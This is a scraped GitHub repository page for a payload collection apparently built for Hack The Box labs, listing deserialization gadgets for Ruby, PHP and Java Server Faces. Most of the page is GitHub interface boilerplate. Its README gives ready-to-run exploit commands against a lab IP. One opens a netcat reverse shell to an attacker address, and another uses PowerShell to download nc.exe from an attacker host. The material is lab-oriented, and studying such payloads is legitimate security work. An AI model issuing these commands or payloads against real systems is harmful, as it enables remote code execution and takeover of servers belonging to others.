Payloads

rubydeserialization.rb - for Ruby 3.X

Source : https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

Java Server Faces object deserialization exploit

python3 exploit.py http://10.10.10.130:8080/userSubscribe.faces "\\programdata\\nc.exe -e cmd.exe 10.10.14.3 9001" SnNGO[SECRECTs]
python3 exploit.py http://10.10.10.130:8080/userSubscribe.faces "powershell -command \\\"Invoke-WebRequest -Uri ht
tp://10.10.14.3/nc.exe -outfile \\programdata\\nc.exe\\\"" SnNGO[SECRETs]

Resources https://github.com/int0x33/nc.exe/ https://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
Pressed		Pressed
JSFJavaDeserializationFaces.py		JSFJavaDeserializationFaces.py
README.md		README.md
phpdeserialization.php		phpdeserialization.php
rubydeserialization.rb		rubydeserialization.rb

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

Payloads

rubydeserialization.rb - for Ruby 3.X

Java Server Faces object deserialization exploit

About

Uh oh!

Releases

Packages

Languages

akuma-log/Payloads-HTB

Folders and files

Latest commit

History

Repository files navigation

Payloads

rubydeserialization.rb - for Ruby 3.X

Java Server Faces object deserialization exploit

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages